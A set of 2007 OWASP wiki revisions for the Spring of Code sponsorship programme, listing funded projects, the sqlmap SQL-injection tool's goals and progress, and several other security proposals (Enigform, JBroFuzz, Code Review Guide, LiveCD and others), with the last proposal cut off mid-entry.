Make sqlmap available as an easy-to-use enumeration and penetration testing tool to the OWASP community extending its functionality to exploit SQL injection vulnerabilities to provide a remote shell on the affected web application database server when possible. In the long run I would also like to develop a graphical user interface.

=== Why I should be sponsored for the project ===

I have good python programming skills and some years of experience in computer networks security. I spent most of the last year researching on web application insecurity taking over the [http://sqlmap.svn.sourceforge.net/viewvc/sqlmap/ sqlmap development] since December 2006. Actually I work as software developer at an information security company in Italy where I mostly deal with vulnerability assessment.

=== Links ===

* [http://sqlmap.sourceforge.net sqlmap homepage]
* [http://sqlmap.svn.sourceforge.net/viewvc/sqlmap/ sqlmap SVN repository web interface]
* [https://sourceforge.net/project/showfiles.php?group_id=171598&package_id=196107 sqlmap SourceForge File List page]
* [http://sqlmap.sourceforge.net/dev/index.html sqlmap development documentation]

'''[http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007_Selection Back to SpoC 007 Selection page]'''

OWASP Spring Of Code 2007 - Projects

2007-07-16T08:12:35Z

Inquis:

== All SpoC Projects ==

{| class="wikitable" WIDTH=100%
|-
! SpoC Project Name
! Author
! Confirmed
! Status
! Coordinated by
|-

|-
! [[SpoC 007 - The OWASP Web Security Certification Framework|The OWASP Web Security Certification Framework]]
| Mark Curphey
| Yes
| 0%
| Dinis Cruz

|-
! [[SpoC 007 - SqlMap|SqlMap]]
| Bernardo Damele
| Yes
| 60%
| Dinis Cruz

|-
! [[SpoC 007 - OWASP Site Generator|OWASP Site Generator]]
| Boris
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - OWASP Report Generator]]
| Boris
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - OWASP Tiger]]
| Boris
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - Attacks Reference Guide|Attacks Reference Guide]]
| NSRAV Security Research Group
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - The Scholastic Application Security Assessment Project|The Scholastic Application Security Assessment Project]]
| Eric Sheridan and
Dr. Goran Trajkovski
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - Inspekt|Inspekt: Input filtering and validation library for PHP]]
| Ed Finkler
| Yes
| 50%
| TBA

|-
! [[SpoC 007 - Code review Project|Code review Project]]
| Eoin Keary
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - OWASP Certification Project|OWASP Certification Project]]
| Matteo Meucci
| No
| 0%
| TBA

|-
! [[SpoC 007 - OWASP Education Project|OWASP Education Project]]
| Sebastien Deleersnyder
| Yes
| 30%
| TBA

|-
! [[SpoC 007 - OWASP The Anti-Samy Project|OWASP The Anti-Samy Project]]
| Arshan Dabirsiaghi
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - Security throughout the SDLC|Security throughout the SDLC]]
| Keith Casey
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - OWASP WebGoat Solutions Guide|OWASP WebGoat Solutions Guide]]
| Erwin Geirnaert
| Yes
| 90%
| TBA

|-
! [[SpoC 007 - OWASP WeBekci Project|OWASP WeBekci Project]]
| Bunyamin Demir
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - Python Tainted Mode|Python Tainted Mode]]
| Denis
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - WebScarab NG Security Test Automation|WebScarab NG Security Test Automation]]
| Darren Edmonds
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - Refresh Attacks list|Refresh Attacks list]]
| Przemyslaw 'rezos' Skowron
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - Best Practices & Countermeasures|Best Practices & Countermeasures]]
| Jim
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - OWASP Brand|OWASP brand]]
| Paulo Coimbra
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - Web Application Security put into practice|Web Application Security put into practice]]
| Heiko Webers
| Yes
| 60%
| TBA

|-
! [[SpoC 007 - OWASP JBroFuzz Project|OWASP JBroFuzz Project]]
| Subere
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - Owasp Orizon Project|Owasp Orizon Project]]
| Paolo Perego
| Yes
| 15%
| TBA

|-
! [[SpoC 007 - Enigform: Firefox Addon for OpenPGP signing of HTTP requests|Enigform: Firefox Addon for OpenPGP signing of HTTP requests]]
| Arturo (Buanzo) Busleiman
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - OWASP LiveCD Education Project|OWASP LiveCD Education Project]]
| Josh Sweeney
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - OWASP Java Project|OWASP Java Project]]
| Erwin Geirnaert
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - OWASP LiveCD Project|OWASP LiveCD Project]]
| Joshua Perrymon
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - Interim @ Aspect Offices|Interim @ Aspect Offices]]
| Andy Gocke
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - 10x 1000USD to FOSS projects we all use |10x 1000USD to FOSS projects we all use ]]
| (tbd)
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - Help with SpoC project management|Help with SpoC project management]]
| Paulo Coimbra
| Yes
| 0%
| TBA

|}

SpoC 007 - SQLMap - Progress Page

2007-07-16T08:10:29Z

Inquis:

==== Accomplished objectives at 12nd of July 2007 ====

* Added support to extract database users password hash on MySQL and PostgreSQL - 100%
* Extended inband SQL injection functionality to all other possible queries - 100%
* Added Microsoft SQL Server database fingerprint - 100%
* Added support for query ETA (Estimated Time of Arrival) real time calculation - 100%
* Improved Google dorking support to take advantage of remote hosts affected by SQL injection to perform other command line argument actions - 100%
* Improved logging functionality - 100%

==== TODO objectives at 12nd of July 2007 ====

* Add support for Oracle database management system - 10%
* Add support to extract database users password hash on Microsoft SQL Server - 10%
* Add a fuzzer class with the aim to parse html page looking for standard database error messages consequently improving database fingerprinting - 40%
* Add support for SQL injection on HTTP ''Cookie'' and ''User-Agent'' headers - 0%

SpoC 007 - SqlMap

2007-07-16T08:10:19Z

Inquis:

''''[http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007_Selection Back to SpoC 007 Selection page]'''

'''AoC Candidate''': Bernardo Damele

'''Project coordinator''': Dinis Cruz

'''Project Progress''': 60% Complete, [[SpoC 007 - SQLMap - Progress Page|Progress Page]]

== Bernardo Damele - SQLMap ==

=== Executive Summary ===

[http://sqlmap.sourceforge.net sqlmap] is an automatic blind SQL injection tool, developed in python, capable to perform an active database management system fingerprint, enumerate entire remote databases and much more. The aim of this project is to implement a fully functional database management system tool which takes advantages of web application programming security flaws which lead to SQL injection vulnerabilities.

=== Objectives for OWASP Spring of Code 2007 ===

* Add support for Oracle database management system
* Add support to extract database users password hash
* Extend inband SQL injection functionality to all other possible queries
* Add Microsoft SQL Server database fingerprint
* Add a fuzzer class with the aim to parse html page looking for standard database error messages consequently improving database fingerprinting
* Add support for SQL injection on HTTP ''Cookie'' and ''User-Agent'' headers
* Add support for query ETA (Estimated Time of Arrival) real time calculation
* Improve Google dorking support to take advantage of remote hosts affected by SQL injection to perform other command line argument actions
* Improve logging functionality

=== Why I should be sponsored for the project ===

I have good python programming skills and some years of experience in computer networks security. I spent most of the last year researching on web application insecurity taking over the [http://sqlmap.svn.sourceforge.net/viewvc/sqlmap/ sqlmap development] since December 2006. Actually I work as software developer at an information security company in Italy where I mostly deal with vulnerability assessment.

=== Links ===

* [http://sqlmap.sourceforge.net sqlmap homepage]
* [http://sqlmap.svn.sourceforge.net/viewvc/sqlmap/ sqlmap SVN repository web interface]
* [https://sourceforge.net/project/showfiles.php?group_id=171598&package_id=196107 sqlmap SourceForge File List page]
* [http://sqlmap.sourceforge.net/dev/index.html sqlmap development documentation]

'''[http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007_Selection Back to SpoC 007 Selection page]'''

User:Inquis

2007-07-12T11:05:59Z

Inquis: New page: ==== Who I am ==== My name is Bernardo, I am originally from Rio de Janeiro (Brazil). I have good python programming skills and some years of experience in computer networks security. I s...

==== Who I am ====

My name is Bernardo, I am originally from Rio de Janeiro (Brazil). I have good python programming skills and some years of experience in computer networks security. I spent most of the last years researching on web application insecurity taking over the [http://sqlmap.sourceforge.net sqlmap] development since December 2006. Actually I work as software developer at an information security company in Italy where I mostly deal with vulnerability assessment.

==== Links ====

* My [http://www.hospitalityclub.org/~inquis/ homepage]
* My [http://bernardodamele.blogspot.com/ blog]
* My [mailto:bernardo.damele@gmail.com email address]
* My [http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007_Applications#Bernardo_-_sqlmap sqlmap application] to the [http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007 OWASP Spring of Code 2007] and its [http://www.owasp.org/index.php/SpoC_007_-_SqlMap OWASP page]

SpoC 007 - SqlMap

2007-07-12T10:47:16Z

Inquis:

'''SpoC Candidate''': [[User:inquis|Bernardo Damele]]

'''Project coordinator''': Dinis Cruz

'''Project Progress''': 60% Complete

=== Project Overview ===

[http://sqlmap.sourceforge.net sqlmap] is an automatic blind SQL injection tool, developed in python, capable to perform an active database management system fingerprint, enumerate entire remote databases and much more. The aim of this project is to implement a fully functional database management system tool which takes advantages of web application programming security flaws which lead to SQL injection vulnerabilities.

=== Objectives for OWASP Spring of Code 2007 ===

* Add support for Oracle database management system
* Add support to extract database users password hash
* Extend inband SQL injection functionality to all other possible queries
* Add Microsoft SQL Server database fingerprint
* Add a fuzzer class with the aim to parse html page looking for standard database error messages consequently improving database fingerprinting
* Add support for SQL injection on HTTP ''Cookie'' and ''User-Agent'' headers
* Add support for query ETA (Estimated Time of Arrival) real time calculation
* Improve Google dorking support to take advantage of remote hosts affected by SQL injection to perform other command line argument actions
* Improve logging functionality

=== Project Progress ===

==== Accomplished objectives at 12nd of July 2007 ====

* Added support to extract database users password hash on MySQL and PostgreSQL - 100%
* Extended inband SQL injection functionality to all other possible queries - 100%
* Added Microsoft SQL Server database fingerprint - 100%
* Added support for query ETA (Estimated Time of Arrival) real time calculation - 100%
* Improved Google dorking support to take advantage of remote hosts affected by SQL injection to perform other command line argument actions -100%
* Improved logging functionality - 100%

==== TODO objectives at 12nd of July 2007 ====

* Add support for Oracle database management system - 10%
* Add support to extract database users password hash on Microsoft SQL Server - 10%
* Add a fuzzer class with the aim to parse html page looking for standard database error messages consequently improving database fingerprinting - 40%
* Add support for SQL injection on HTTP ''Cookie'' and ''User-Agent'' headers - 0%

=== Links ===

* [http://sqlmap.sourceforge.net sqlmap homepage]
* [http://sqlmap.svn.sourceforge.net/viewvc/sqlmap/ sqlmap SVN repository web interface]
* [https://sourceforge.net/project/showfiles.php?group_id=171598&package_id=196107 sqlmap SourceForge File List page]
* [http://sqlmap.sourceforge.net/dev/index.html sqlmap development documentation]

OWASP Spring Of Code 2007 - Projects

2007-07-12T10:12:05Z

Inquis:

== All SpoC Projects. ==

{| class="wikitable" WIDTH=100%
|-
! SpoC Project Name
! Author
! Confirmed
! Status
! Coordinated by
|-

|-
! [[SpoC 007 - The OWASP Web Security Certification Framework|The OWASP Web Security Certification Framework]]
| Mark Curphey
| Yes
| 0%
| Dinis Cruz

|-
! [[SpoC 007 - SqlMap|SqlMap]]
| Bernardo Damele
| Yes
| 60%
| Dinis Cruz

|-
! [[SpoC 007 - OWASP Site Generator|OWASP Site Generator]]
|
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - Attacks Reference Guide|Attacks Reference Guide]]
|
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - The Scholastic Application Security Assessment Project|The Scholastic Application Security Assessment Project]]
|
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - A comprehensive input retrieval/filtering system for PHP|A comprehensive input retrieval/filtering system for PHP]]
|
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - Code review Project|Code review Project]]
|
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - OWASP Certification Project|OWASP Certification Project]]
|
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - OWASP Education Project|OWASP Education Project]]
|
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - OWASP The Anti-Samy Project|OWASP The Anti-Samy Project]]
|
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - Security throughout the SDLC|Security throughout the SDLC]]
|
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - OWASP WebGoat Solutions Guide|OWASP WebGoat Solutions Guide]]
|
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - OWASP WeBekci Project|OWASP WeBekci Project]]
|
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - Python Tainted Mode|Python Tainted Mode]]
|
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - WebScarab NG Security Test Automation|WebScarab NG Security Test Automation]]
|
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - Refresh Attacks list|Refresh Attacks list]]
|
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - Best Practices & Countermeasures|Best Practices & Countermeasures]]
|
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - OWASP Brand|OWASP brand]]
| Paulo Coimbra
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - Web Application Security put into practice|Web Application Security put into practice]]
|
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - OWASP JBroFuzz Project|OWASP JBroFuzz Project]]
|
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - Owasp Orizon Project|Owasp Orizon Project]]
|
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - Enigform: Firefox Addon for OpenPGP signing of HTTP requests|Enigform: Firefox Addon for OpenPGP signing of HTTP requests]]
|
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - OWASP LiveCD Education Project|OWASP LiveCD Education Project]]
|
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - OWASP Java Project|OWASP Java Project]]
|
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - Help with SpoC project management|Help with SpoC project management]]
|
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - OWASP LiveCD Project|OWASP LiveCD Project]]
|
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - Interim @ Aspect Offices|Interim @ Aspect Offices]]
|
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - 10x 1000USD to FOSS projects we all use |10x 1000USD to FOSS projects we all use ]]
|
| Yes
| 0%
| TBA

|}

OWASP Spring Of Code 2007 Applications

2007-03-30T14:09:00Z

Inquis:

This page contains project Applications to the [[OWASP_Spring_Of_Code_2007]]

'''If you want to apply for a SpoC 007 sponsorship you HAVE TO USE THIS PAGE for your application'''

See [[OWASP_Spring_Of_Code_2007#How_To_Participate]] for what do to one you completed your Application

---------

'''Proposed template:''' {for longer proposals, in addition to these details you can create a PDF}:

== {Your first name or Alias} - {Project name} ==
Please remember that projects will be selected and funded based on how well they meet the [[OWASP_Spring_Of_Code_2007_:_Selection|Selection Criteria]].

You can propose your project in any form you wish, but the best proposals will be well thought out, clear and concise, and reflective of your passion for the topic. We strongly suggest that you include the following information in your proposal.

* Your educational and professional background

* Application security experience and accomplishments

* Participation and leadership in open communities

* The opportunity, challenges, issues or need your proposal addresses

* Objectives or ways in which you will meet the goal(s)

* Specific activities and who will carry out these activities

* Specific deliverables and a rough project schedule so we can track progress

* Long-term vision for the project

* Any other reasons why you and your project should be selected

== Buanzo - Enigform: Firefox Addon for OpenPGP signing of HTTP requests ==

I am a 25 year old Independent security consultant from Buenos Aires, Argentina, that has contributed to the world of
information systems security since 1994, when BBSes and Linux still lived together.

A quick search for buanzo on google [http://www.google.com/search?hl=en&q=buanzo&btnG=Google+Search] will provide all necessary details about my professional and community background. For comprobable experience, you could also check my Rent a Coder profile.[http://www.rentacoder.com/RentACoder/SoftwareCoders/showBioInfo.asp?lngAuthorId=735204].

In my free time I like playing with my Punk-Pop band [http://www.purevolume.com/futurabandapunkpop], Futurabanda. [http://www.futurabanda.com.ar], and maintaining my Restaurants, Wines and Recipes site. [http://www.vivamoslavida.com.ar]. I have to admit that my first priorities are my beloved son [http://www.fotolog.com/buanzo] and my wonderful wife [http://www.fotolog.com/buanzo].

=== Accomplishments ===

I've contributed scripts, fixes and translations to the Nmap project. I've also acted as Expert Contributor for SANS TOP-20 2004, 2005 and 2006. I've developed
tools that can be found in Freshmeat, like mprl (a getty enhancement to allow remote logins from the login: prompt of the console). I've also written
the Unix chapter of the OISSG's Information Systems Security Assessment Framework, v0.1 [http://www.oissg.org/content/view/71/71/]. I'm currently writing
an Internet Draft to be proposed for RFC regarding Enigform.

=== Community ===

I run the official 2600 meetings site for Argentina [http://www.2600.com/meetings/pages.html], I've been proposed, but I refused, for President of the Argentinian Free Software group called SOLAR [www.solar.org.ar]. I'm an active member of the FLOSS community since 1996, having written articles in magazines http://www.net-security.org/dl/articles/Detecting_and_Understanding_rootkits.txt, made TV, radio
and newspaper appearances [http://codigoabierto.bitacoras.com/archivos/2005/04/01/buanzo-hacks] and led different security research groups of Spain, Mexico and Argentina. Currently I contribute time thorugh my sites, forums and blogs,
answering questions in mailing lists and helping coordinate some local LUGs. I do also manager the Linux Counter for Argentina [http://counter.li.org/reports/place.php?place=AR].

=== My Project ===

Enigform [http://enigform.mozdev.org] is a Firefox extension that enhances HTTP with OpenPGP functionality. It digitally signs outgoing HTTP requests so that a web server can authenticate the identity and data of the incoming request. It is a Web Security tool because it can, if correctly implemented as any OpenPGP based technology, render man in the middle attacks useless. I think OpenPGP already speaks for itself regarding eMail. Imagine the same benefits for http and web applications. I think Enigform can fit into the OWASP Validation Project [http://www.owasp.org/index.php/Category:OWASP_Validation_Project].

Enigform is the reference implementation of the Internet Draft I'm working on, in discussion with members of the IETF's OpenPGP Working Group.

Some simple PHP code is enough to make a web application Enigform-aware [http://enigformtest.buanzo.com.ar]. The Smutty PHP MVC Framework already supports Enigform [http://smutty.pu-gh.com/demo/enigform].

=== Long Term ===

Have the Draft be proposed as a Standards Track RFC document, have Enigform support directly in Apache and IIS, and port Enigform to other browsers
and/or programming languages, and also provide OpenPGP De/Encryption support.

=== Why should I be selected ===

I have the experience, security awareness and means to make this project THE web security project of the decade. I am a respected member of the
international security community, and I firmly believe Enigform is my greatest idea so far.

== Eoin Keary - Code review Project ==
* '''Executive Summary''':
I am proposing that I complete the OWASP Code review guide during this period.
The code review guide was started by me in 2005 and has much information on reviewing code for common vulnerabilities. It is frequently accessed (looking at the stats on the OWASP site) and therefore is useful to practitioners.

I believe the code review guide is an integral part of the OWASP BOK (Body of Knowledge). Ensuring secure development is key to secure applications and code review is of paramount importance in this domain.

There are many sections still to be added and more to be readjusted and rewritten to reflect the current state of the security world.
Much needs to be written on Web 2.0 technologies and distributed B2B technologies such as Webservices.

The Code review process and procedure needs also to be covered. A guide to establishing a mature code review process also needs to be done.
Code review methodologies also need to be discussed.

* '''Objectives and Deliverables''':

Update of the code review guide:
* Add additional areas relating to the code review process such as:
** Benefits and pitfalls
** Methodology
** The code review process
*** Transactional analysis
*** Managing the code review process
*** Assigning risk to findings

** Technical guides
*** Language specific best practice
*** Java
*** .NET
*** PHP
*** MySQL
*** Stored Procs
*** C/C++

** Code review by vulnerability:
*** Reviewing Code for Buffer Overruns and Overflows
*** Reviewing Code for OS Injection
*** Reviewing Code for SQL Injection
*** Reviewing Code for Data Validation
*** Reviewing code for XSS issues
*** Reviewing Code for Error Handling
*** Reviewing Code for Logging Issues
*** Reviewing The Secure Code Environment
*** Reviewing code for Authorization Issues
*** Reviewing code for Authentication Issues
*** Reviewing code for Session Integrity
*** Reviewing code for Cross Site Request Forgery
*** Reviewing code for Cryptography implementation issues
*** Reviewing code Dangerous HTTP Methods (Deployment)
*** Race Conditions

The areas of code are structured giving a brief explanation, the anti-pattern (vulnerable pattern to look for) and a suggested fix.

* '''Why I should be sponsored for the project''':

I used to head up the code review team as part of the application security group in fidelity investments and have 5+ years of the secure code review process.
I also was the lead of the Testing guide until V2 was published via the Autumn of Code.

I have always delivered any work I have volunteered for on time.

I have been involved in OWASP projects for 2/3 years now and have always been an active contributor.

== Paolo Perego - Owasp Orizon Project ==
* '''Executive Summary''':
Owasp Orizon [http://www.owasp.org/index.php/Category:OWASP_Orizon_Project] Project born in 2006 as answer to the lack of common engine and library usable by opensource code review related tools.

I'm proposing that, during the Spring of Code 2007 period, I'll complete static analisys API and java source code enforment objects.

Sometimes a complete code review approach is not suitable for most customers who wants to harden their code which is being approaching release stage. For such a reason, I started writing Java objects that embeds most of the security checks against common web vulnerabilities (XSS, SQL injection, Session handling, ...) so that source code can be hardened with a small effort in terms of code rewriting.

I do believe that a common set of API and a common safe coding best practices library is one of the most important goals to bring application security to the developers.

* '''Objectives and Deliverables''':
Completing the static code review API section
* improving programming language to XML translator
* improving security best practices code review scan library
* improving secure coding fashion best practices library
* writing the pattern matching scan using the aformentioned libraries
Writing the java source code enforment objects
* writing an object to handle form data values to avoid XSS
* writing an object to handle form data values to avoid SQL Injection
* writing an object to handle HttpRequest and HttpSession objects

* '''Why I should be sponsored for the project''':
Owasp Orizon is the first Owasp project I'm involved in. I'm also contributor of Owasp Italian chapter managed by Matteo Meucci and I'm talking at various speeches about application security and safe coding best practices.

I'm a security consultant working in ethical hacking and we're approaching code review and safe topics right now.
I'm a developer too so I understand also the "dark side" of the problem developing code with security in mind.

I work using the "release early release often" paradigm so to be concrete and let other people having something usable to work with.

== Sebastien Deleersnyder - OWASP Education Project ==
* '''Executive Summary''':
This Education project aims to provide in building blocks of web application security information. These modules can be combined together in education tracks targeting different audiences.

Web Application Security Education and Awareness is needed throughout the entire organization, each area and level of organizations have specific needs and requirements regarding education. A manager needs other information than a security professional or developer. Novices to the profession require other training than people with several years of experience.

* '''Objectives and Deliverables''':
Currently the project goals are to create Educational Tracks:
* Complete the [[OWASP Education Presentation|consolidation page of OWASP presentations]] performed in the past
* A "Web Application Security Primer" Track for beginners (4 hours)
* A "What developers should know on Web Application Security" Track for developers (4 hours)

* '''Why you should be sponsored for the project''':
I started the successful Belgian Chapter 3 years ago and have actively contributed to OWASP since then. I also co-organized the European conference last year in Belgium.

This is the first separate project that I started, originating from a local demand to set up educational tracks for people that are new to Web Application Security. There are literally hundreds of presentations and an enormous amount of information on the OWASP web site. The goal of this project is to restructure pieces of that information in reusable modules that can be combined in educational tracks. It is my believe that awareness is an important cornerstone of building secure web applications, and this project will actively support that.

If we are granted Spoc 007 participation, I will be sharing the budget with all active participants. This will be an extra motivation for project participation. I will reinvest my part in the project to set up a web conferencing / web casting solution to be used to disseminate the project results and make them available for later use.

* '''More details''':
The detailed [[OWASP Education Project Roadmap|road map]] can be found here.
The SpoC 007 goal is to finish Sub Goals 1, 2, 3 and 4. If time permits we can start with sub goal 5.

== Subere - OWASP JBroFuzz Project ==

==== Overview ====

JBroFuzz is a stateless network protocol fuzzer that emerged from the needs of penetration testing. The purpose of this application is to provide a single, portable application that offers stable cross-platform network protocol fuzzing capabilities. At the same time, JBroFuzz attempts to keep the User Interface (UI) as intuitive as possible.

==== Fuzzing ====

As seen by the emphasis given on the subject of fuzzing in the 2007 Testing Guide (v2), network protocol fuzzing serves as a fundamental cornerstone of application security testing. For this, many different categories and types of fuzzing have been defined.

==== Objectives ====

JBroFuzz needs to expand and grow in order to cover network fuzzing in a more complete manner. Its modular implementation allows for the addtion of new functionality by means of independent tabs. The key tabs proposed to be added during the spring of code 2007 are (details in next section):

* '''Open Source Tab'''
* '''NTLM Brute Force over HTTP/S Tab'''
* '''Pure HTTP/S Fuzzing using HTTPClient'''
* '''Blind SQL Injection Fuzzing Tab'''

At the same time, the following existing tabs need to be updated and made more robust (details in next section):

* '''TCP Fuzzing tab allowing graph outputs'''
* '''TCP Sniffing tab update thread Agent Queue'''
* '''Update Generators file format'''
* '''Include SOAP and XML fuzzing'''

This expansion process relates to stabilising code that is presently included in JBroFuzz, thus allowing it to run for extensive periods of time (24h+) as well as adding more functionality in terms of the three new tabs.

==== Deliverables ====

Based on the above, the new code elements that will be added are as follows:

* '''Open Source Tab:''' ''Provide the ability to enumerate e-mails from newsgroups without breaching google automated search rules''
* '''NTLM Brute Force over HTTP/S Tab:''' ''Provide the ability to enumerate NTLM as well as brute over HTTP/S NTLM.''
* '''Pure HTTP/S Fuzzing:''' ''Implement a fuzzing tab utilising HTTPClient from Jakarta that will also allow for multi-threading''
* '''Blind SQL Fuzzing Tab''' ''Implement a tab that extracts information from a blind SQL injection point identified on web server over HTTP/HTTPS.''

For updating existing code elements that require a partial rewrite, the following areas of focus are presented in detail:

* '''TCP Fuzzing tab allowing graph outputs:''' ''Provide the ability to graph fuzzing results during a particular session run. This will give the ability to integrate and pickup potential fuzzing patterns.''
* '''TCP Sniffing tab update thread Agent Queue:''' ''Update the code of the sniffing panel in order to handle threaded agents in a more memory efficient way.''
* '''Update Generators file format:''' ''Update the generators file format to allow for the parsing and creation of recursive generators.''
* '''Include SOAP and XML fuzzing:''' ''Include an up to date list of SOAP and XML fuzzing templates.''

Overall, the above two lists of changes should provide sufficient complexity and output for the spring of code 2007, forming a challenging implementation project.

==== Background ====

In its short life, the OWASP JBroFuzz Project has attracted the interest of the online security community with a total of appr. 5000 downloads in the last months.

Coming from a strong java background (5+ years) I decided to implement and release JBroFuzz in order to initially simplify penetrations testing processes that relate to web application and network protocol fuzzing.

I see the spring of code 2007 as a unique opportunity to industrialise network protocol fuzzing (and in particular HTTP/S fuzzing) within a single application, residing within OWASP.

==== Why should JBroFuzz be sponsored? ====

Centralising fuzzing resources into one application that has the ability to handle network protocol fuzzing over HTTP and HTTPS in a simple and intuitive manner forms an area of focus that should not be dismissed in building secure software applications.

Keep the code platform independent adds a huge advantage.

Receving an OWASP grant from the spring of code 2007 will trigger a share in the budget with all active participants depending on their level of involvement. This will be a direct function of the number of tabs and/or user functionality that they have assisted in implementing.

== Joshua Perrymon - OWASP LiveCD Project ==
* '''Executive Summary''':
I am proposing that I complete the second version of the OWASP LiveCD during this period.
The first version of the LiveCD is now available and include many of the current OWASP documents and tools. I believe the LiveCD is one of the best mediums to promote OWASP tools and documentation. It is portable and already being used by thousands of security proffesionals to perform application testing and training.

In the current state the CD is stable and contains a lot of tools. However, this is just the beginning. There is a LOT of work that needs to be completed. The entire CD experience needs to be branded using OWASP graphics. This shouls start with the boot screen and carry all the way through to the icons and desktop graphics. The CD should also inlcude the wiki and ALL the tools developed for OWASP.

* '''Objectives and Deliverables''':

Update of the LiveCD:
* Complete OWASP branding
* Add OWASP wiki
* Add encryption capabilities
* Add more OWASP tools
* Add more pen-test tools such as;
VOIP, RFID, BlueTooth, Wireless, etc..

* '''Why I should be sponsored for the project''':

I had the idea of the LiveCD about a year ago and have worked very hard to get the first version developed. This was driven by my vision to make all of the OWASP tools available on a portable medium. The main difference in the OWASP liveCD vs. other live CDs is going to be the regularity of updates. If sponsorship can be obtained the CD could be updated on a monthly basis. Not once a year like other liveCDs. The CD will also include specialty tools and documentation to perform VOIP, RFID,Bluetooth, and wireless security assessments.

----

== Mark Curphey – The OWASP Web Security Certification Framework ==

'''Problem'''

PCI DSS is attracting a lot of criticism for a lot of valid reasons.

http://securitybuddha.com/2007/03/23/the-problems-with-the-pci-data-security-standard-part-1/

http://blogs.csoonline.com/node/210

http://www.computerweekly.com/blogs/stuart_king/2007/03/more-on-pci---the-audit-guide.html

The list is of course long and not appropriate here……and while its easy to knock PCI, there is nothing better out there.

'''Solution and Deliverables'''

As opposed to me continuing saying what’s wrong with PCI DSS, it seems to me that OWASP is a perfect forum to simply create and publish a “better criteria”. This can either be adopted and implemented by an organization like OWASP or considered to be incorporated into the PCI or other security standards. We won't get bogged down in the politics up-front, but hold something good up to the world for people to adopt. This project would of course draw on and bring together many of the other OWASP Projects including the Guide (What is a secure web app), Testing Guides (How to test for a secure web app), WebGoat (part of how to certify an individual understands and can find web app issues) etc. Many of those projects may not be complete or a perfect fit today, but this project can bring a common connecting theme to a lot of very valuable IP that OWASP has built over the years. I will also create it in such as way that a corporate could adopt/adapt it themseles as well as an industry. Where other OWASP projects are not complete or currently suitable I will build a requirements doc that can be considered by those teams if they feel appropriate.

This project would address the;

'''Standard'''
*A complete auditable (important) web site security standard suitable for modern e-commerce companies including
**The technical things people should care about
**The operational / management things people should care about
'''Certification Model'''
*A complete framework for certification (ongoing) and implementation (including certifying auditors, ongoing validation etc). This will include for example the model for certifying auditors (including the actual test program); checklists and forms for auditors to complete and other supporting material.

Essentially its a complete blueprint for an organisation like OWASP or a regulatory body need to run a web site security certification program complete with the supporting material to implement it.

Note: This is no trivial task to get right. I would need to ensure I can commit to completing the work to a good quality. I think this will take at least 2 months from start to finish to complete but I think is very important for the industry and for potentially for OWASP. I wanted to gauge the interest by first posting this.

== Erwin Geirnaert - OWASP Java Project ==

* '''Executive Summary''':
I would like to help the OWASP Java Project to gather all Java security related information and to document any domains that lack documentation.

* '''Objectives and Deliverables''':
The main objective I see is to gather all information in one place, where security experts and developers can find the information they need.
In order to get there, I need to collect all information in the OWASP Wiki, ask people if they want to donate it to OWASP so that we can include it as public material, add URLs, white-papers, references to books, ... And if time permits, write some documentation myself.

One deliverable is the OWASP Top 10 for J2EE applications with clear examples of vulnerabilities and mitigations.

* '''Why you should be sponsored for the project''':
I have more then 10 years experience in Java and J2EE and the last 6 years I have tested and broke a lot of web applications. I gave also some very successful J2EE security courses and web security courses. I spoke at different conferences about application security in Europe.
And I am responsible for the security track at Javapolis, one of the biggest Jave conferences in Europe.
I am the co-founder of ZION SECURITY where we do security testing, code review, design reviews, training,...
I'm also member of the OWASP Belgium board that started in March 2007.

== Erwin Geirnaert - OWASP WebGoat Solutions Guide ==

* '''Executive Summary''':
WebGoat is used by a lot of people to learn about web application security and the different vulnerabilities. But it takes a lot of time to grasp how the tools like WebScarab work and how to use them effectively in WebGoat. I propose to create a walkthrough of the lessons in WebGoat so that people can learn from the solutions, without spoiling the fun.

* '''Objectives and Deliverables''':
